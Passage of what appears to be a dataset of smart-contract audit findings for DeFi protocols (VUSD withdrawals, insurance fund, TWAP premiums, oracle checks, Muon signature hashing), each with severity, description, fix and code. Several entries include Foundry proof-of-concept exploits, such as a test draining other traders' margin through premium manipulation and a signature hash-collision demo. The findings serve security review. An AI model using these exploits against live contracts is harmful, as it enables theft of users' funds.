husd.withdraw(amount); // first withdraw in the array\\n vm.prank(alice);\\n husd.withdraw(amount);\\n vm.prank(bob); // Bob is the malicious user and he wants to withdraw the VUSD to his smart contract\\n husd.withdrawTo(address(r), amount);\\n\\n assertEq(husd.withdrawalQLength(), 3);\\n assertEq(husd.start(), 0);\\n\\n husd.processWithdrawals(); // This doesn't fail on foundry because foundry's gas limit is way higher than ethereum's. 
\\n\\n uint256 ethereumSoftGasLimit = 30_000_000;\\n assertGt(r.gas(), ethereumSoftGasLimit); // You can only transfer at most 63/64 gas to an external call and the fact that the recorded amt of gas is > 30m shows that processWithdrawals will always revert when called on mainnet. \\n }\\n\\n receive() payable external {\\n assertEq(msg.sender, address(husd));\\n }\\n}\\n```\\n -Failed withdrawals from VUSD#processWithdrawals will be lost foreverчhighчWhen withdrawals fail inside VUSD#processWithdrawals they are permanently passed over and cannot be retried. The result is that any failed withdrawal will be lost forever.\\nVUSD.sol#L75-L81\\n```\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}(\"\");\\n if (success) {\\n reserve -= withdrawal.amount;\\n } else {\\n emit WithdrawalFailed(withdrawal.usr, withdrawal.amount, data);\\n }\\n i += 1;\\n```\\n\\nIf the call to withdrawal.usr fails the contract will simply emit an event and continue on with its cycle. Since there is no way to retry withdrawals, these funds will be permanently lost.чCache failed withdrawals and allow them to be retried or simply send VUSD to the user if it fails.чWithdrawals that fail will be permanently lockedч```\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}(\"\");\\n if (success) {\\n reserve -= withdrawal.amount;\\n } else {\\n emit WithdrawalFailed(withdrawal.usr, withdrawal.amount, data);\\n }\\n i += 1;\\n```\\n -Malicious user can frontrun withdrawals from Insurance Fund to significantly decrease value of sharesчmediumчWhen a user withdraws from the insurance fund, the value of their shares is calculated based on the balance of vUSD in the fund. 
Another user could deliberately frontrun (or frontrun by chance) the withdrawal with a call to `settleBadDebt` to significantly reduce the vUSD returned from the withdrawal with the same number of shares.\\nWhen a user wants to `withdraw` from the insurance pool they have to go through a 2 step withdrawal process. First they need to unbond their shares, and then they have to wait for the pre-determined unbonding period before they can `withdraw` the vUSD their shares are worth by calling `withdraw`.\\nWhen a user calls `withdraw` the amount of vUSD to redeem is calculated as:\\n```\\namount = balance() * shares / totalSupply();\\n```\\n\\nwhere `balance()` is the balance of vUSD in the contract and `totalSupply()` is the total supply of share tokens. Therefore, if the balance of vUSD in the contract were to decrease, then the amount of vUSD redeemed from the same number of shares would decrease as a result.\\nThis occurs when a trader's bad debt is settled when calling `settleBadDebt` in `MarginAccount.sol` as this calls `insuranceFund.seizeBadDebt` under the hood, which in turn calls `settlePendingObligation` which transfers vUSD out of the insurance fund to the margin account:\\n```\\nvusd.safeTransfer(marginAccount, toTransfer);\\n```\\n\\nThe result is now that the balance of vUSD in the insurance fund is lower and thus the shares are worth less vUSD as a consequence.чOne option would be to include a slippage parameter on the `withdraw` and `withdrawFor` methods so that the user redeeming shares can specify the minimum amount of vUSD they would accept for their shares.\\nWhen depositing into the insurance fund, the number of shares to mint is actually calculated based on the total value of the pool (value of vUSD and all other collateral assets). Therefore, the withdraw logic could also use `_totalPoolValue` instead of `balance()` to get a \"true\" value per share, however this could lead to withdrawals failing while assets are up for auction. 
Assuming all the assets are expected to be sold within the short 2 hour auction duration, this is probably the better solution given the pricing is more accurate, but it depends if users would accept failed withdrawals for short periods of time.чA user withdrawing from the insurance fund could receive significantly less (potentially 0) vUSD when finalising their withdrawal.ч```\\namount = balance() * shares / totalSupply();\\n```\\n -min withdraw of 5 VUSD is not enough to prevent DOS via VUSD.sol#withdraw(amount)чmediumчA vulnerability exists where a malicious user spam the contract with numerous withdrawal requests (e.g., 5,000). This would mean that genuine users who wish to withdraw their funds may find themselves unable to do so in a timely manner because the processing of their withdrawals could be delayed significantly.\\nThe issue stems from the fact that there is no restriction on the number of withdrawal requests a single address can make. A malicious actor could repeatedly call the withdraw or withdrawTo function, each time with a small amount (min 5 VUSD), to clog the queue with their withdrawal requests.\\n```\\n //E Burn vusd from msg.sender and queue the withdrawal to \"to\" address\\n function _withdrawTo(address to, uint amount) internal {\\n //E check min amount\\n require(amount >= 5 * (10 ** 6), \"min withdraw is 5 vusd\"); //E @audit-info not enough to prevent grief\\n //E burn this amount from msg.sender\\n burn(amount); // burn vusd from msg.sender\\n //E push \\n withdrawals.push(Withdrawal(to, amount * 1e12));\\n }\\n```\\n\\nGiven the maxWithdrawalProcesses is set to 100, and the withdrawal processing function processWithdrawals doesn't have any parameter to process from a specific index in the queue, only the first 100 requests in the queue would be processed at a time.\\n```\\n uint public maxWithdrawalProcesses = 100;\\n //E create array of future withdrawal that will be executed to return\\n function withdrawalQueue() external view 
returns(Withdrawal[] memory queue) {\\n //E check if more than 100 requests in withdrawals array\\n uint l = _min(withdrawals.length-start, maxWithdrawalProcesses);\\n queue = new Withdrawal[](l);\\n\\n for (uint i = 0; i < l; i++) {\\n queue[i] = withdrawals[start+i];\\n }\\n }\\n```\\n\\nIn the case of an attack, the first 100 withdrawal requests could be those of the attacker, meaning that the genuine users' requests would be stuck in the queue until all of the attacker's requests have been processed. Moreover the fact that we can only withdraw up to 1 day long when our withdraw request is good to go.чEither limit number of withdrawal requests per address could be a first layer of defense even if it's not enough but I don't see the point why this limit is included so removing it could mitigate this. Otherwise you could implement a priority queue regarding amount to be withdrawnчThis could result in significant delays for genuine users wanting to withdraw their funds, undermining the contract's usability and users' trust in the platform.ч```\\n //E Burn vusd from msg.sender and queue the withdrawal to \"to\" address\\n function _withdrawTo(address to, uint amount) internal {\\n //E check min amount\\n require(amount >= 5 * (10 ** 6), \"min withdraw is 5 vusd\"); //E @audit-info not enough to prevent grief\\n //E burn this amount from msg.sender\\n burn(amount); // burn vusd from msg.sender\\n //E push \\n withdrawals.push(Withdrawal(to, amount * 1e12));\\n }\\n```\\n -Malicious user can control premium emissions to steal margin from other tradersчmediumчA malicious user can force premiums to be applied in a positive direction for their positions. 
They can effectively steal margin from other traders that have filled the other side of their positions.\\nThis vulnerability stems from how the premiums are calculated when `settleFunding` is called in AMM.sol:\\n```\\nint256 premium = getMarkPriceTwap() - underlyingPrice;\\n```\\n\\nEffectively, the premium for a position is calculated based on the difference between the perpetual maker TWAP and the oracle TWAP. Under the hood, `getMarkPriceTwap` calls `_calcTwap`, which calculates the TWAP price from the last hour to the current block timestamp:\\n```\\n uint256 currentPeriodStart = (_blockTimestamp() / spotPriceTwapInterval) * spotPriceTwapInterval;\\n uint256 lastPeriodStart = currentPeriodStart - spotPriceTwapInterval;\\n\\n // If there is no trade in the last period, return the last trade price\\n if (markPriceTwapData.lastTimestamp <= lastPeriodStart) {\\n return markPriceTwapData.lastPrice;\\n }\\n\\n /**\\n * check if there is any trade after currentPeriodStart\\n * since this function will not be called before the nextFundingTime,\\n * we can use the lastPeriodAccumulator to calculate the twap if there is a trade after currentPeriodStart\\n */\\n if (markPriceTwapData.lastTimestamp >= currentPeriodStart) {\\n // use the lastPeriodAccumulator to calculate the twap\\n twap = markPriceTwapData.lastPeriodAccumulator / spotPriceTwapInterval;\\n } else {\\n // use the accumulator to calculate the twap\\n uint256 currentAccumulator = markPriceTwapData.accumulator + (currentPeriodStart - markPriceTwapData.lastTimestamp) * markPriceTwapData.lastPrice;\\n twap = currentAccumulator / spotPriceTwapInterval;\\n }\\n```\\n\\nThis method works closely in conjunction with `_updateTWAP` which is called every time a new position is opened based on the fill price. I'll talk more about his in the \"Recommendation\" section, but the core issue is that too much weight is placed on the last price that was filled, along with the fact the user can open uncapped positions. 
As can be seen from the `_calcTwap` method above, if there has not been a recently opened position, then the TWAP is determined as the last filled price. And naturally, a time weighted price isn't weighted by the size of a fill as well, so the size of the last fill has no impact.\\nAs a result of this, a malicious user can place orders (which should then be executed by the validators) at a price that maximises the difference between the market TWAP and the oracle TWAP in order to maximise the premiums generated in the market. If the malicious user opens up a large enough position, the premiums generated exceed the taker/maker fees for opening positions. And since the same user can place orders for both sides of the market, they do not need to increase their margin requirement over time in order to meet the minimum margin requirements. Effectively the user is able to generate free revenue assuming the price of the underlying asset doesn't significantly deviate in the opposite direction of the large position held by the user.\\nBelow is a diff to the existing test suite with a test case that shows how a malicious user could control premiums to make a profit. 
It can be run with forge test -vvv --match-path test/foundry/OrderBook.t.sol:\\n```\\ndiff --git a/hubble-protocol/test/foundry/OrderBook.t.sol b/hubble-protocol/test/foundry/OrderBook.t.sol\\nindex b4dafdf..f5d36b2 100644\\n--- a/hubble-protocol/test/foundry/OrderBook.t.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/hubble-protocol/test/foundry/OrderBook.t.sol\\n@@ -228,6 // Add the line below\\n228,60 @@ contract OrderBookTests is Utils {\\n assertPositions(bob, -size, quote, 0, quote * 1e18 / stdMath.abs(size));\\n }\\n \\n// Add the line below\\n function testUserCanControlEmissions() public {\\n// Add the line below\\n uint256 price = 1e6;\\n// Add the line below\\n oracle.setUnderlyingPrice(address(wavax), int(uint(price)));\\n// Add the line below\\n\\n// Add the line below\\n // Calculate how much margin required for 100x MIN_SIZE\\n// Add the line below\\n uint256 marginRequired = orderBook.getRequiredMargin(100 * MIN_SIZE, price) * 1e18 / uint(defaultWethPrice) // Add the line below\\n 1e10; // required weth margin in 1e18, add 1e10 for any precision loss\\n// Add the line below\\n \\n// Add the line below\\n // Let's say Alice is our malicious user, and Bob is a normal user\\n// Add the line below\\n addMargin(alice, marginRequired, 1, address(weth));\\n// Add the line below\\n addMargin(bob, marginRequired, 1, address(weth));\\n// Add the line below\\n\\n// Add the line below\\n // Alice places a large legitimate long order that is matched with a short order from Bob\\n// Add the line below\\n placeAndExecuteOrder(0, aliceKey, bobKey, MIN_SIZE * 90, price, true, false, MIN_SIZE * 90, false);\\n// Add the line below\\n\\n// Add the line below\\n // Alice's free margin is now pretty low\\n// Add the line below\\n int256 availabeMargin = marginAccount.getAvailableMargin(alice);\\n// Add the line below\\n assertApproxEqRel(availabeMargin, 200410, 0.1e18); // Assert within 10%\\n// Add the line below\\n\\n// Add the line 
below\\n // Calculate what's the least we could fill an order for given the oracle price\\n// Add the line below\\n uint256 spreadLimit = amm.maxOracleSpreadRatio();\\n// Add the line below\\n uint minPrice = price * (1e6 - spreadLimit) / 1e6;\\n// Add the line below\\n\\n// Add the line below\\n // Alice can fill both sides of an order at the minimum fill price calculated above, with the minimum size\\n// Add the line below\\n // Alice would place such orders (and hopefully have them executed) just after anyone else makes an order in a period (1 hour)\\n// Add the line below\\n // The goal for Alice is to keep the perpetual TWAP as low as possible vs the oracle TWAP (since she holds a large long position)\\n// Add the line below\\n // In quiet market conditions Alice just has to make sure she's the last person to fill\\n// Add the line below\\n // In busy market conditions Alice would fill an order immediately after anyone else fills an order\\n// Add the line below\\n // In this test Alice fills an order every 2 periods, but in reality, if nobody was trading then Alice wouldn't have to do anything provided she was the last filler\\n// Add the line below\\n for (uint i = 0; i < 100; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n uint256 currentPeriodStart = (block.timestamp / 1 hours) * 1 hours;\\n// Add the line below\\n\\n// Add the line below\\n // Warp to before the end of the period\\n// Add the line below\\n vm.warp(currentPeriodStart // Add the line below\\n 3590);\\n// Add the line below\\n \\n// Add the line below\\n // Place and execute both sides of an order as Alice\\n// Add the line below\\n // Alice can do this because once both sides of the order are executed, the effect to her free margin is 0\\n// Add the line below\\n // As mentioned above, Alice would place such orders every time after another order is executed\\n// Add the line below\\n placeAndExecuteOrder(0, aliceKey, aliceKey, MIN_SIZE, minPrice, true, false, 
MIN_SIZE, false);\\n// Add the line below\\n \\n// Add the line below\\n // Warp to the start of the next period\\n// Add the line below\\n vm.warp(currentPeriodStart // Add the line below\\n (3600 * 2) // Add the line below\\n 10);\\n// Add the line below\\n \\n// Add the line below\\n // Funding is settled. This calculates the premium emissions by comparing the perpetual twap with the oracle twap\\n// Add the line below\\n orderBook.settleFunding();\\n// Add the line below\\n }\\n// Add the line below\\n\\n// Add the line below\\n // Alice's margin is now significantly higher (after just 200 hours) because she's been pushing the premiums in her direction\\n// Add the line below\\n availabeMargin = marginAccount.getAvailableMargin(alice);\\n// Add the line below\\n assertApproxEqRel(availabeMargin, 716442910, 0.1e18); // Assert within 10%\\n// Add the line below\\n\\n// Add the line below\\n }\\n// Add the line below\\n\\n function testLiquidateAndExecuteOrder(uint64 price, uint120 size_) public {\\n vm.assume(price > 10 && size_ != 0);\\n oracle.setUnderlyingPrice(address(wavax), int(uint(price)));\\n```\\nчI originally thought the best way to mitigate this kind of attack is to scale the TWAP calculation based on the filled amount vs the total fill amount of the whole market. However the downside with this approach is that the fill amount will perpetually increase (given it's a perpetual market after all!) and so the market TWAP deviations from the oracle TWAP would decrease and so the premium emissions would also decrease over time. This could be argued as a feature in that early users receive a larger premium than later users.\\nUpon further thought I think the best way to prevent this kind of attack is simply to disincentivise the malicious user from doing so; by making this a net-loss situation. 
This can be done with a combination of the following:\\nIncreasing minimum order size\\nIncreasing trader/maker fees\\nIntroducing another fixed fee per order (rather than only variable rate fees)\\nCapping the maximum position size (both long and short)\\nReducing the maximum price deviation of fill prices from oracle price\\nIncreasing the minimum margin requirements\\nThis will vary per perpetual market, but the key thing that needs to be accomplished is that the cost to a user to place orders to control the market TWAP is greater than the premium that can be obtained from their position. This will also require some estimates as to how frequently users are going to be placing orders. If orders are relatively infrequent then increasing the TWAP calculation from 1 hour will also help with this.\\nIt is also worth considering whether the following lines in `_calcTwap` are overly weighted towards the last fill price:\\n```\\n // If there is no trade in the last period, return the last trade price\\n if (markPriceTwapData.lastTimestamp <= lastPeriodStart) {\\n return markPriceTwapData.lastPrice;\\n }\\n```\\n\\nYou could make the argument that if no trades have occurred in a significant period of time then the market TWAP should revert back to the oracle TWAP and premium emissions should halt. This could either be after one empty period, or X number of empty periods to be defined by Hubble.\\nFinally, having a trader able to hold both sides of the same perpetual in the same order makes this attack easier to implement, so it might be worth adding an extra check to prevent this. However it's worth noting the same could be achieved with 2 accounts assuming they alternated the long/short positions between them to avoid excessive margin requirements. So I'm not sure this is strictly necessary.чA user can effectively steal funds from other traders that are filling the other side of their positions. 
The larger the position the malicious user is able to fill and the longer the period, the more funds can be credited to the malicious user's margin account.ч```\\nint256 premium = getMarkPriceTwap() - underlyingPrice;\\n```\\n -Malicious user can grief withdrawing users via VUSD reentrancyчmediumчVUSD#processWithdraw makes a call to withdrawal.usr to send the withdrawn gas token. processWithdrawals is the only nonreentrant function allowing a user to create a smart contract that uses it's receive function to deposit then immediately withdraw to indefinitely lengthen the withdrawal queue and waste large amounts of caller gas.\\nVUSD.sol#L69-L77\\n```\\n while (i < withdrawals.length && (i - start) < maxWithdrawalProcesses) {\\n Withdrawal memory withdrawal = withdrawals[i];\\n if (reserve < withdrawal.amount) {\\n break;\\n }\\n\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}(\"\");\\n if (success) {\\n reserve -= withdrawal.amount;\\n```\\n\\nTo send the withdrawn gas token to the user VUSD#processWithdrawals utilizes a call with no data. When received by a contract this will trigger it's receive function. This can be abused to continually grief users who withdraw with no recurring cost to the attacker. To exploit this the attacker would withdraw VUSD to a malicious contract. This contract would deposit the received gas token then immediately withdraw it. This would lengthen the queue. Since the queue is first-in first-out a user would be forced to process all the malicious withdrawals before being able to process their own. While processing them they would inevitably reset the grief for the next user.\\nNOTE: I am submitting this as a separate issue apart from my other two similar issues. I believe it should be a separate issue because even though the outcome is similar the root cause is entirely different. 
Those are directly related to the incorrect call parameters while the root cause of this issue is that both mintWithReserve and withdraw/withdrawTo lack the nonReentrant modifier, allowing this malicious reentrancy.чAdd the nonReentrant modifier to mintWithReserve, withdraw and withdrawToчMalicious user can maliciously reenter VUSD to grief users via unnecessary gas wastageч```\\n while (i < withdrawals.length && (i - start) < maxWithdrawalProcesses) {\\n Withdrawal memory withdrawal = withdrawals[i];\\n if (reserve < withdrawal.amount) {\\n break;\\n }\\n\\n (bool success, bytes memory data) = withdrawal.usr.call{value: withdrawal.amount}(\"\");\\n if (success) {\\n reserve -= withdrawal.amount;\\n```\\n -Malicious users can donate/leave dust amounts of collateral in contract during auctions to buy other collateral at very low pricesчmediumчAuctions are only ended early if the amount of the token being auctioned drops to 0. This can be exploited via donation or leaving dust in the contract to maliciously extend the auction and buy further liquidated collateral at heavily discounted prices.\\nInsuranceFund.sol#L184-L199\\n```\\nfunction buyCollateralFromAuction(address token, uint amount) override external {\\n Auction memory auction = auctions[token];\\n // validate auction\\n require(_isAuctionOngoing(auction.startedAt, auction.expiryTime), \"IF.no_ongoing_auction\");\\n\\n // transfer funds\\n uint vusdToTransfer = _calcVusdAmountForAuction(auction, token, amount);\\n address buyer = _msgSender();\\n vusd.safeTransferFrom(buyer, address(this), vusdToTransfer);\\n IERC20(token).safeTransfer(buyer, amount); // will revert if there wasn't enough amount as requested\\n\\n // close auction if no collateral left\\n if (IERC20(token).balanceOf(address(this)) == 0) { <- @audit-issue only cancels auction if balance = 0\\n auctions[token].startedAt = 0;\\n }\\n}\\n```\\n\\nWhen buying collateral from an auction, the auction is only closed if the balance of the token is 0.
This can be exploited in a few ways to maliciously extend auctions and keep the timer (and price) decreasing. The first would be to buy all but 1 wei of a token, leaving it in the contract so the auction won't close. Since 1 wei isn't worth the gas costs to buy, there would be a negative incentive to buy the collateral, likely resulting in no one buying the final amount. A second approach would be to frontrun any buys with a single wei transfer with the same results.\\nNow that the auction has been extended, any additional collateral added during the duration of the auction will start immediately well below the asset's actual value. This allows malicious users to buy the asset for much cheaper, causing loss to the insurance fund.чClose the auction if there is less than a certain threshold of a token remaining after it has been bought:\\n```\\n IERC20(token).safeTransfer(buyer, amount); // will revert if there wasn't enough amount as requested\\n\\n+ uint256 minRemainingBalance = 1 * 10 ** (IERC20(token).decimal() - 3);\\n\\n // close auction if no collateral left\\n+ if (IERC20(token).balanceOf(address(this)) <= minRemainingBalance) {\\n auctions[token].startedAt = 0;\\n }\\n```\\nчUsers can maliciously extend auctions and potentially get collateral for very cheapч```\\nfunction buyCollateralFromAuction(address token, uint amount) override external {\\n Auction memory auction = auctions[token];\\n // validate auction\\n require(_isAuctionOngoing(auction.startedAt, auction.expiryTime), \"IF.no_ongoing_auction\");\\n\\n // transfer funds\\n uint vusdToTransfer = _calcVusdAmountForAuction(auction, token, amount);\\n address buyer = _msgSender();\\n vusd.safeTransferFrom(buyer, address(this), vusdToTransfer);\\n IERC20(token).safeTransfer(buyer, amount); // will revert if there wasn't enough amount as requested\\n\\n // close auction if no collateral left\\n if (IERC20(token).balanceOf(address(this)) == 0) { <- @audit-issue only cancels auction if balance = 0\\n
auctions[token].startedAt = 0;\\n }\\n}\\n```\\n -MarginAccountHelper will be bricked if registry.marginAccount or insuranceFund ever changeчmediumчMarginAccountHelper#syncDeps causes the contract to refresh it's references to both marginAccount and insuranceFund. The issue is that approvals are never made to the new contracts rendering them useless.\\nMarginAccountHelper.sol#L82-L87\\n```\\nfunction syncDeps(address _registry) public onlyGovernance {\\n IRegistry registry = IRegistry(_registry);\\n vusd = IVUSD(registry.vusd());\\n marginAccount = IMarginAccount(registry.marginAccount());\\n insuranceFund = IInsuranceFund(registry.insuranceFund());\\n}\\n```\\n\\nWhen syncDeps is called the marginAccount and insuranceFund references are updated. All transactions require approvals to one of those two contract. Since no new approvals are made, the contract will become bricked and all transactions will revert.чRemove approvals to old contracts before changing and approve new contracts afterчContract will become bricked and all contracts that are integrated or depend on it will also be brickedч```\\nfunction syncDeps(address _registry) public onlyGovernance {\\n IRegistry registry = IRegistry(_registry);\\n vusd = IVUSD(registry.vusd());\\n marginAccount = IMarginAccount(registry.marginAccount());\\n insuranceFund = IInsuranceFund(registry.insuranceFund());\\n}\\n```\\n -No `minAnswer/maxAnswer` Circuit Breaker Checks while Querying Prices in Oracle.solчmediumчThe Oracle.sol contract, while currently applying a safety check (this can be side stepped, check my other submission ) to ensure returned prices are greater than zero, which is commendable, as it effectively mitigates the risk of using negative prices, there should be an implementation to ensure the returned prices are not at the extreme boundaries (minAnswer and maxAnswer). 
Without such a mechanism, the contract could operate based on incorrect prices, which could lead to an over- or under-representation of the asset's value, potentially causing significant harm to the protocol.\\nChainlink aggregators have a built-in circuit breaker if the price of an asset goes outside of a predetermined price band. The result is that if an asset experiences a huge drop in value (e.g. the LUNA crash) the price of the oracle will continue to return the minPrice instead of the actual price of the asset. This would allow users to continue borrowing with the asset but at the wrong price. This is exactly what happened to Venus on BSC when LUNA imploded. In its current form, the `getUnderlyingPrice()` function within the Oracle.sol contract retrieves the latest round data from Chainlink; if the asset's market price plummets below `minAnswer` or skyrockets above `maxAnswer`, the returned price will still be `minAnswer` or `maxAnswer`, respectively, rather than the actual market price.
This could potentially lead to an exploitation scenario where the protocol interacts with the asset using incorrect price information.\\nTake a look at Oracle.sol#L106-L123:\\n```\\n function getLatestRoundData(AggregatorV3Interface _aggregator)\\n internal\\n view\\n returns (\\n uint80,\\n uint256 finalPrice,\\n uint256\\n )\\n {\\n (uint80 round, int256 latestPrice, , uint256 latestTimestamp, ) = _aggregator.latestRoundData();\\n finalPrice = uint256(latestPrice);\\n if (latestPrice <= 0) {\\n requireEnoughHistory(round);\\n (round, finalPrice, latestTimestamp) = getRoundData(_aggregator, round - 1);\\n }\\n return (round, finalPrice, latestTimestamp);\\n }\\n```\\n\\nIllustration:\\nPresent price of TokenA is $10\\nTokenA has a minimum price set at $1 on chainlink\\nThe actual price of TokenA dips to $0.10\\nThe aggregator continues to report $1 as the price.\\nConsequently, users can interact with protocol using TokenA as though it were still valued at $1, which is a tenfold overestimate of its real market value.чSince there is going to be a whitelist of tokens to be added, the minPrice/maxPrice could be checked and a revert could be made when this is returned by chainlink or a fallback oracle that does not have circuit breakers could be implemented in that caseчThe potential for misuse arises when the actual price of an asset drastically changes but the oracle continues to operate using the `minAnswer` or `maxAnswer` as the asset's price. 
In the case of it going under the `minAnswer` malicious actors obviously have the upperhand and could give their potential going to zero worth tokens to protocolч```\\n function getLatestRoundData(AggregatorV3Interface _aggregator)\\n internal\\n view\\n returns (\\n uint80,\\n uint256 finalPrice,\\n uint256\\n )\\n {\\n (uint80 round, int256 latestPrice, , uint256 latestTimestamp, ) = _aggregator.latestRoundData();\\n finalPrice = uint256(latestPrice);\\n if (latestPrice <= 0) {\\n requireEnoughHistory(round);\\n (round, finalPrice, latestTimestamp) = getRoundData(_aggregator, round - 1);\\n }\\n return (round, finalPrice, latestTimestamp);\\n }\\n```\\n -setSymbolsPrice() can use the priceSig from a long time agoчhighч`setSymbolsPrice()` only restricts the maximum value of `priceSig.timestamp`, but not the minimum time This allows a malicious user to choose a malicious `priceSig` from a long time ago A malicious `priceSig.upnl` can seriously harm `partyB`\\n`setSymbolsPrice()` only restricts the maximum value of `priceSig.timestamp`, but not the minimum time\\n```\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n LibMuon.verifyPrices(priceSig, partyA);\\n require(\\n priceSig.timestamp <=\\n maLayout.liquidationTimestamp[partyA] + maLayout.liquidationTimeout,\\n \"LiquidationFacet: Expired signature\"\\n );\\n```\\n\\nLibMuon.verifyPrices only check sign, without check the time range\\n```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, \"LibMuon: Invalid length\");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n 
priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\n\\nIn this case, a malicious user may pick any `priceSig` from a long time ago, and this `priceSig` may have a large negative `unpl`, leading to `LiquidationType.OVERDUE`, severely damaging `partyB`\\nWe need to restrict `priceSig.timestamp` to be no smaller than `maLayout.liquidationTimestamp[partyA]` to avoid this problemчrestrict `priceSig.timestamp` to be no smaller than `maLayout.liquidationTimestamp[partyA]`\\n```\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n LibMuon.verifyPrices(priceSig, partyA);\\n require(maLayout.liquidationStatus[partyA], \"LiquidationFacet: PartyA is solvent\");\\n require(\\n priceSig.timestamp <=\\n maLayout.liquidationTimestamp[partyA] + maLayout.liquidationTimeout,\\n \"LiquidationFacet: Expired signature\"\\n );\\n+ require(priceSig.timestamp >= maLayout.liquidationTimestamp[partyA],\"invald price timestamp\");\\n```\\nчMaliciously choosing the illegal `PriceSig` thus may hurt others userч```\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n LibMuon.verifyPrices(priceSig, partyA);\\n require(\\n priceSig.timestamp <=\\n maLayout.liquidationTimestamp[partyA] + maLayout.liquidationTimeout,\\n \"LiquidationFacet: Expired signature\"\\n );\\n```\\n -LibMuon Signature hash collisionчhighчIn `LibMuon` , all signatures do not distinguish between type prefixes, and `abi.encodePacked` is used when calculating the hash Cause when `abi.encodePacked`, if there is a dynamic array, different structures but 
the same hash value may be obtained Due to conflicting hash values, signatures can be substituted for each other, making malicious use of illegal signatures possible\\nThe following two methods are examples\\n1.verifyPrices:\\n```\\n function verifyPrices(PriceSig memory priceSig, address partyA) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n require(priceSig.prices.length == priceSig.symbolIds.length, \"LibMuon: Invalid length\");\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n priceSig.reqId,\\n address(this),\\n partyA,\\n priceSig.upnl,\\n priceSig.totalUnrealizedLoss,\\n priceSig.symbolIds,\\n priceSig.prices,\\n priceSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, priceSig.sigs, priceSig.gatewaySignature);\\n }\\n```\\n\\n2.verifyPartyAUpnlAndPrice\\n```\\n function verifyPartyAUpnlAndPrice(\\n SingleUpnlAndPriceSig memory upnlSig,\\n address partyA,\\n uint256 symbolId\\n ) internal view {\\n MuonStorage.Layout storage muonLayout = MuonStorage.layout();\\n// require(\\n// block.timestamp <= upnlSig.timestamp + muonLayout.upnlValidTime,\\n// \"LibMuon: Expired signature\"\\n// );\\n bytes32 hash = keccak256(\\n abi.encodePacked(\\n muonLayout.muonAppId,\\n upnlSig.reqId,\\n address(this),\\n partyA,\\n AccountStorage.layout().partyANonces[partyA],\\n upnlSig.upnl,\\n symbolId,\\n upnlSig.price,\\n upnlSig.timestamp,\\n getChainId()\\n )\\n );\\n verifyTSSAndGateway(hash, upnlSig.sigs, upnlSig.gatewaySignature);\\n }\\n```\\n\\nWe exclude the same common part (muonAppId/reqId/address (this)/timestamp/getChainId ())\\nThrough the following simplified test code, although the structure is different, the hash value is the same at that time\\n```\\n function test() external {\\n address verifyPrices_partyA = address(0x1);\\n int256 verifyPrices_upnl = 100;\\n int256 verifyPrices_totalUnrealizedLoss = 100;\\n uint256 [] memory verifyPrices_symbolIds = new uint256[](1);\\n 
verifyPrices_symbolIds[0]=1;\\n uint256 [] memory verifyPrices_prices = new uint256[](1);\\n verifyPrices_prices[0]=1000; \\n\\n bytes32 verifyPrices = keccak256(abi.encodePacked(\\n verifyPrices_partyA,\\n verifyPrices_upnl,\\n verifyPrices_totalUnrealizedLoss,\\n verifyPrices_symbolIds,\\n verifyPrices_prices\\n ));\\n\\n address verifyPartyAUpnlAndPrice_partyA = verifyPrices_partyA;\\n int256 verifyPartyAUpnlAndPrice_partyANonces = verifyPrices_upnl;\\n int256 verifyPartyAUpnlAndPrice_upnl = verifyPrices_totalUnrealizedLoss;\\n uint256 verifyPartyAUpnlAndPrice_symbolId = verifyPrices_symbolIds[0];\\n uint256 verifyPartyAUpnlAndPrice_price = verifyPrices_prices[0];\\n\\n\\n bytes32 verifyPartyAUpnlAndPrice = keccak256(abi.encodePacked(\\n verifyPartyAUpnlAndPrice_partyA,\\n verifyPartyAUpnlAndPrice_partyANonces,\\n verifyPartyAUpnlAndPrice_upnl,\\n verifyPartyAUpnlAndPrice_symbolId,\\n verifyPartyAUpnlAndPrice_price\\n ));\\n\\n console.log(\"verifyPrices == verifyPartyAUpnlAndPrice:\",verifyPrices == verifyPartyAUpnlAndPrice);\\n\\n }\\n```\\n\\n```\\n$ forge test -vvv\\n\\nRunning 1 test for test/Counter.t.sol:CounterTest\\n[PASS] test() (gas: 4991)\\nLogs:\\n verifyPrices == verifyPartyAUpnlAndPrice: true\\n\\nTest result: ok. 
